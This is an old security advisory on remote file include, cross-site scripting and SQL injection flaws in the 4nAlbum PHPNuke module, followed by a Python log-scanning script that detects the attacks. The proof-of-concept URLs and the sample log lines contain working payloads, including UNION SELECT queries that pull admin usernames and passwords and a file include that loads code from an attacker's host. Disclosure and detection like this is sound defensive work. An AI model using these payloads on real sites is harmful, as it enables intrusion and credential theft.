

Title WarpSpeed 4nAlbum Module For PHPNuke Multiple Vulnerabilities
Published 2004-03-15-12:00AM
Updated 2004-03-15-10:12PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Disclosure of these issues is credited to Janek Vind <come2waraxe@yahoo.com>.
Vulnerable  WarpSpeed 4nAlbum Module 0.92
Not Vulnerable  
Code   The following proof of concept was provided:

To leverage the remote file include:
http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/

For this to work, the attacker must host malicious code in the script 'http://www.example.net/public/imageFunctions.php'.

To leverage the cross-site scripting issue:
http://www.example.com/phpNukeDirectory/modules/4nalbum/public/nmimage.php?z=[xss code here]

To leverage the SQL injection issue:
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
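
For defenders reviewing web server logs, the three request patterns above can be matched as shown here. This is an added example, not code from the advisory or from the 4nAlbum project; the log format, sample lines, rule labels and the assumption that `gid` is a plain integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; paths and parameters follow the advisory's PoC URLs.
SAMPLE_LOG = [
    '198.51.100.7 "GET /nuke/modules/4nalbum/public/displaycategory.php'
    '?basepath=http://www.example.net/ HTTP/1.0" 200',
    '198.51.100.7 "GET /nuke/modules/4nalbum/public/nmimage.php'
    '?z=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200',
    '198.51.100.7 "GET /nuke/modules.php?op=modload&name=4nAlbum&file=index'
    '&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null'
    '%20FROM%20nuke_authors/* HTTP/1.0" 200',
    '203.0.113.9 "GET /nuke/modules.php?op=modload&name=4nAlbum&file=index'
    '&do=showgall&gid=12 HTTP/1.0" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)


def classify(line):
    """Return the set of advisory issues that one log line matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return set()
    url = urlsplit(m.group(1))
    path = url.path.lower()
    # parse_qs percent-decodes values, so encoded payloads are compared decoded.
    params = {k.lower(): v for k, v in
              parse_qs(url.query, keep_blank_values=True).items()}
    hits = set()
    if path.endswith("/4nalbum/public/displaycategory.php"):
        if any(REMOTE_URL_RE.match(v) for v in params.get("basepath", [])):
            hits.add("remote-file-include")
    if path.endswith("/4nalbum/public/nmimage.php"):
        if any(re.search(r"[<>\"']", v) for v in params.get("z", [])):
            hits.add("xss")
    if "4nalbum" in (v.lower() for v in params.get("name", [])):
        # Assumption: gid is a non-negative integer gallery id.
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("gid", [])):
            hits.add("sql-injection")
    return hits


def scan(lines):
    """Return (line_number, issues) for every line that matched a rule."""
    return [(n, sorted(h)) for n, line in enumerate(lines, 1)
            if (h := classify(line))]


if __name__ == "__main__":
    for n, issues in scan(SAMPLE_LOG):
        print(n, issues)
```

The fourth sample line is an ordinary gallery request and produces no match, which is the baseline to compare flagged lines against.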



Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:57:38 +0000
